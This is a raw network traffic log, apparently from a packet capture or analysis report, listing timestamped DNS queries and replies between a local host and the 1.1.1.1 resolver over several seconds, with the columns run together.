                                                                                                                                                                                                          Nov 11, 2024 18:24:46.638787985 CET53553501.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.639271021 CET53521721.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.641654968 CET53605941.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.642784119 CET53572251.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.644864082 CET53510001.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.653063059 CET53604051.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.655654907 CET53636191.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.822108030 CET5272453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.841851950 CET53527241.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.960943937 CET5422153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.962795973 CET5296553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.963279963 CET5912553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.964711905 CET5748453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.966873884 CET5619253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.971230984 CET53542211.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.971338034 CET5118653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.973758936 CET53529651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.974669933 CET6481553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.975748062 CET5000253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.976512909 CET53561921.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.981995106 CET53648151.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.983660936 CET53574841.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.988666058 CET53500021.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.988967896 CET4956153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.994606018 CET6357853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.994749069 CET5847853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.995125055 CET6522653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.995157003 CET5977553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.995582104 CET4961653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.996172905 CET53591251.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.999301910 CET53495611.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.003552914 CET53511861.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.006021023 CET53584781.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.015829086 CET5076653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.016064882 CET5607153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.023145914 CET6255853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.026187897 CET53652261.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.026628971 CET53597751.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.026639938 CET53560711.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.026828051 CET53635781.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.027009010 CET53496161.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.029988050 CET53507661.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.030179977 CET6285553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.040757895 CET53625581.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.048535109 CET5623053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.048825979 CET6419953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.049009085 CET5983853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.053539991 CET6255953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.053903103 CET5004553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.054615021 CET6246453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.056608915 CET5832153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.057251930 CET5337053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.059282064 CET53562301.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.059463024 CET6194653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.059684038 CET53598381.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.061425924 CET6088053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.061707020 CET6384553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.061757088 CET53628551.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.066323042 CET53533701.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.066414118 CET53583211.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.070806026 CET53619461.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.070818901 CET53608801.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.071284056 CET53638451.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.072216034 CET53625591.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.072997093 CET53624641.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.080430031 CET53641991.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.085669041 CET5280253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.086155891 CET6432753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.086332083 CET6479653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.086509943 CET5345553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.653176069 CET53530811.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.654431105 CET53507691.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.654711962 CET53601261.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.654764891 CET53641981.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.656605005 CET53548301.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.665004969 CET5042753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.665987968 CET5578853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.666389942 CET6307553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.666747093 CET5759553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.667212009 CET6529253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.667500973 CET6132553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.667522907 CET6111053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.667819023 CET5347853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.667840958 CET6475853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.668106079 CET6054053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.668301105 CET5200953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.668567896 CET5767453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.668776035 CET5353553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.673963070 CET53557881.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.674132109 CET5516453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.674256086 CET5918553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.674412012 CET5924353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.675652981 CET53504271.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.675964117 CET53605401.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.676505089 CET53630751.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.677196026 CET53613251.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.678977966 CET53647581.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.679003000 CET53520091.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.679160118 CET53576741.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.686173916 CET53592431.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.686184883 CET53591851.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.689441919 CET6422653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.690323114 CET6154853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.690872908 CET5719353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.692517996 CET6249453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.694489002 CET6202953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.697802067 CET53575951.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.698050976 CET53652921.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.698137999 CET53611101.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.699048996 CET53642261.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.699156046 CET6198253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.699666023 CET6267053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.699829102 CET53535351.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.699855089 CET53534781.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.700058937 CET53615481.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.700689077 CET5893053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.700975895 CET5020153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.700987101 CET53571931.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.702193975 CET5679353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.703171015 CET53624941.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.706166029 CET53551641.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.708841085 CET53619821.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.709569931 CET53626701.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.710686922 CET53589301.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.711828947 CET53567931.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.726525068 CET53620291.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.733251095 CET53502011.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.485253096 CET6297453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.488550901 CET4933653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.489425898 CET6522353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.492350101 CET5381553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.494491100 CET5343053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.503989935 CET53534301.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.507206917 CET53493361.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.516227007 CET53629741.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.522995949 CET53652231.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.524648905 CET53538151.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.548059940 CET5254253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.548352957 CET5201753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.568631887 CET5448253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.579395056 CET53520171.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.579410076 CET53525421.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.601453066 CET53544821.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.606359959 CET5888353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.607108116 CET6304653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.607790947 CET5987353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.616465092 CET53588831.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.616946936 CET53630461.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.618398905 CET53598731.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.631758928 CET5027753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.651937008 CET5228053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.653882027 CET6519753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.663161993 CET53651971.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.663222075 CET53502771.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.669162989 CET5132753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.677472115 CET6405453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.679888964 CET53513271.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.684309959 CET53522801.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.685214043 CET5331953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.686012030 CET5665453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.687937021 CET4996553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.690463066 CET53640541.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.690628052 CET5115153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.692930937 CET6026553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.694031000 CET5195653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.694467068 CET6120253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.695117950 CET53533191.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.698412895 CET53499651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.700773001 CET53511511.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.702799082 CET53602651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.703680038 CET6308153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.704682112 CET53612021.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.705689907 CET5423553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.707376957 CET6357453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.707658052 CET5781653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.708327055 CET5170753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.541660070 CET6018553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.541820049 CET6015453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.541960001 CET5495453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.542171001 CET6162253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.542617083 CET6143253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.542778015 CET6358853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.542956114 CET5536053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.545353889 CET53568161.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.546092033 CET53613131.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.547703028 CET53595971.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.547764063 CET53521371.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.547781944 CET53651471.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.547794104 CET53519101.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.547897100 CET53494231.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.548283100 CET53531971.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.548311949 CET53647801.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.549468994 CET53604231.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.549746037 CET53584771.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.550406933 CET53552701.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.550776958 CET53572681.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.551282883 CET53651941.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.551367998 CET53502301.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.552267075 CET53636291.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.552791119 CET53553601.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.554208040 CET5700553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.554718018 CET6508053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.554836988 CET53635881.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.557899952 CET5834753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.558074951 CET5034153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.558227062 CET5006853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.558374882 CET5197053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.558598995 CET53601541.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.558856964 CET6186853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.566905022 CET53595341.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.568021059 CET53519701.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.568732977 CET53507391.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.569339991 CET53515691.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.569499969 CET53506151.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.569880962 CET53590101.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.571259975 CET53624241.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.571378946 CET53626311.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.572776079 CET53616221.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.573112011 CET53650801.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.573355913 CET53601851.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.574728966 CET53614321.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.574817896 CET53549541.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.576611042 CET53500681.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.586091042 CET53570051.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.590883970 CET53583471.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.590899944 CET53503411.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.590914011 CET53618681.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.618438005 CET5120053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.621239901 CET4957153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.621493101 CET5942653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.628288984 CET53512001.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.630203009 CET5114153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.631357908 CET53495711.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.631808043 CET5394353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.632425070 CET6077753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.632611990 CET5933553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.633476019 CET5698953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.641041994 CET53511411.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.642096996 CET53539431.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.642165899 CET53593351.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.642503023 CET53607771.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.645560980 CET53569891.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.652569056 CET53594261.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.323288918 CET6521253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.333003998 CET53652121.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.386430025 CET5150053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.387187958 CET5602553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.389484882 CET6150553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.390428066 CET6185653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.400829077 CET53560251.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.400919914 CET5670553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.404783010 CET53618561.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.409092903 CET53567051.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.422476053 CET53515001.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.424098969 CET53615051.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.427473068 CET5011053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.448486090 CET5304153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.459588051 CET53501101.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.461375952 CET53530411.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.476851940 CET6000153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.486540079 CET53600011.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.511444092 CET4925553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.521225929 CET53492551.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.568222046 CET5314853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.600740910 CET53531481.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.602427006 CET5301253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.610102892 CET53530121.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.218621016 CET6177553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.219046116 CET6310853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.219340086 CET5018053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.228940010 CET53631081.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.236501932 CET53501801.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.287945032 CET5825453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.298300982 CET53582541.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.299238920 CET5137553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.306947947 CET53513751.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.346816063 CET53617751.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.398035049 CET5577553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.411056995 CET6010753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.419946909 CET53557751.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.589545965 CET5249753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.590857983 CET6284853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.398473024 CET53615181.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.399868965 CET53598451.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.400618076 CET53520031.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.400716066 CET53652571.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.401591063 CET53538671.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.406085968 CET53645661.1.1.1192.168.2.8
